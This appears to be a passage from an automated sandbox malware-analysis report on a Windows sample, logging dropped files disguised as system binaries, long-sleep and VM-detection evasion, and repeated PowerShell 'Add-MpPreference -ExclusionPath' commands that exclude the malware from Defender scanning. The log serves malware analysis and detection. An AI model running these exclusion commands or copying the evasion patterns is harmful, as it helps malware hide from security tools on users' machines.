                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost (reported 2 times)
Source: C:\Browserhost\intoHostperf.exe - Memory allocated: DD0000 memory reserve | memory write watch
Source: C:\Browserhost\intoHostperf.exe - Memory allocated: 1A8A0000 memory reserve | memory write watch
Source: C:\Recovery\upfc.exe - Memory allocated: 1590000 memory reserve | memory write watch
Source: C:\Recovery\upfc.exe - Memory allocated: 1B150000 memory reserve | memory write watch
Source: C:\Recovery\upfc.exe - Memory allocated: 1250000 memory reserve | memory write watch
Source: C:\Recovery\upfc.exe - Memory allocated: 1B1A0000 memory reserve | memory write watch
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe - Memory allocated: 2C00000 memory reserve | memory write watch
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe - Memory allocated: 1ADB0000 memory reserve | memory write watch
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe - Memory allocated: 15B0000 memory reserve | memory write watch
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe - Memory allocated: 1B150000 memory reserve | memory write watch
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe - Memory allocated: AC0000 memory reserve | memory write watch
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe - Memory allocated: 1A630000 memory reserve | memory write watch
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe - Memory allocated: D60000 memory reserve | memory write watch
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe - Memory allocated: 1AB30000 memory reserve | memory write watch
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe - Memory allocated: 11A0000 memory reserve | memory write watch
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe - Memory allocated: 1AD80000 memory reserve | memory write watch
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe - Memory allocated: F30000 memory reserve | memory write watch
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe - Memory allocated: 1ABE0000 memory reserve | memory write watch
Source: C:\Browserhost\intoHostperf.exe - Memory allocated: C80000 memory reserve | memory write watch
Source: C:\Browserhost\intoHostperf.exe - Memory allocated: 1A900000 memory reserve | memory write watch
Source: C:\Browserhost\intoHostperf.exe - Memory allocated: EC0000 memory reserve | memory write watch
Source: C:\Browserhost\intoHostperf.exe - Memory allocated: 1A9E0000 memory reserve | memory write watch
Source: C:\Browserhost\intoHostperf.exe - Thread delayed: delay time: 922337203685477 (reported 3 times)
Source: C:\Recovery\upfc.exe - Thread delayed: delay time: 922337203685477 (reported 2 times)
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe - Thread delayed: delay time: 922337203685477 (reported 2 times)
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe - Thread delayed: delay time: 922337203685477 (reported 2 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477 (reported 13 times)
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe - Thread delayed: delay time: 922337203685477 (reported 2 times)
Source: C:\Windows\SysWOW64\wscript.exe - Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2260
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2077
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1944
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2053
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2883
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1695
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\HhGhtKRk.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\jcBCwIrh.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\QuHEOinP.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\GTYGJoJn.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\TkyvVenI.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\WuUwVxTJ.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\zmrZuvIB.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\pEXJLSDT.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\bnxVycYy.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\NzFoXiJZ.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\urpInPSH.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\wtcqJyWC.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\kIWsDnNZ.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\DaJYXsXp.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\xpPRZvtG.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\QQZxdmXS.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\AkShQvXv.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\CdhQCsIu.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\nBlbpjyY.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\ZuimMgmz.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\TBFNkAhL.log
Source: C:\Browserhost\intoHostperf.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\XrvErxiE.log
Source: C:\Browserhost\intoHostperf.exe TID: 4720 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\upfc.exe TID: 3192 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\upfc.exe TID: 7100 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe TID: 7652 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe TID: 7964 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe TID: 7916 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 - Thread sleep count: 2260 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236 - Thread sleep count: 2077 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268 - Thread sleep count: 1944 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 - Thread sleep count: 2053 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520 - Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 - Thread sleep count: 2883 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244 - Thread sleep count: 1695 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe TID: 8020 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe TID: 8024 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe TID: 7936 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Browserhost\intoHostperf.exe TID: 7988 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Browserhost\intoHostperf.exe TID: 7980 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed (reported 9 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Last function: Thread delayed (reported 2 times)
Source: C:\Browserhost\intoHostperf.exe - File Volume queried: C:\ FullSizeInformation (reported 3 times)
Source: C:\Recovery\upfc.exe - File Volume queried: C:\ FullSizeInformation (reported 2 times)
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe - File Volume queried: C:\ FullSizeInformation (reported 2 times)
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe - File Volume queried: C:\ FullSizeInformation (reported 2 times)
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe - File Volume queried: C:\ FullSizeInformation (reported 2 times)
Source: C:\Users\user\Desktop\DCobxod.exe - Code function: 0_2_0041A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0041A69B
Source: C:\Users\user\Desktop\DCobxod.exe - Code function: 0_2_0042C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0042C220
Source: C:\Users\user\Desktop\DCobxod.exe - Code function: 0_2_0043B348 FindFirstFileExA,0_2_0043B348
Source: C:\Users\user\Desktop\DCobxod.exe - Code function: 0_2_0042E6A3 VirtualQuery,GetSystemInfo,0_2_0042E6A3
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: intoHostperf.exe, 00000005.00000002.2406845361.000000001C4C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                    Source: wscript.exe, 00000002.00000003.2078792761.0000000002520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: DCobxod.exe, winlogon.exe.5.dr, upfc.exe.5.dr, intoHostperf.exe.0.drBinary or memory string: TA78xqEmUU7dB6KMXiyr
                                    Source: DCobxod.exe, winlogon.exe.5.dr, upfc.exe.5.dr, intoHostperf.exe.0.drBinary or memory string: cR81GxEmH8h5ktqEmuqY
                                    Source: intoHostperf.exe, 00000005.00000002.2377746189.000000001B7A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\X;!
                                    Source: C:\Users\user\Desktop\DCobxod.exeAPI call chain: ExitProcess graph end nodegraph_0-25035
                                    Source: C:\Browserhost\intoHostperf.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042F838
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00437DEE mov eax, dword ptr fs:[00000030h]0_2_00437DEE
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0043C030 GetProcessHeap,0_2_0043C030
                                    Source: C:\Browserhost\intoHostperf.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess token adjusted: Debug
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeProcess token adjusted: Debug
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess token adjusted: Debug
                                    Source: C:\Browserhost\intoHostperf.exeProcess token adjusted: Debug
                                    Source: C:\Browserhost\intoHostperf.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042F838
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042F9D5 SetUnhandledExceptionFilter,0_2_0042F9D5
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0042FBCA
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00438EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00438EBD
                                    Source: C:\Browserhost\intoHostperf.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'
Source: C:\Users\user\Desktop\DCobxod.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Browserhost\intoHostperf.exe "C:\Browserhost/intoHostperf.exe"
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0042F654 cpuid 0_2_0042F654
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0042AF0F
Source: C:\Browserhost\intoHostperf.exe | Queries volume information: C:\Browserhost\intoHostperf.exe VolumeInformation
Source: C:\Browserhost\intoHostperf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Browserhost\intoHostperf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Recovery\upfc.exe | Queries volume information: C:\Recovery\upfc.exe VolumeInformation
Source: C:\Recovery\upfc.exe | Queries volume information: C:\Recovery\upfc.exe VolumeInformation
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe VolumeInformation
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Queries volume information: C:\Browserhost\LaSqLWtOcizKrlm.exe VolumeInformation
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Queries volume information: C:\Browserhost\LaSqLWtOcizKrlm.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
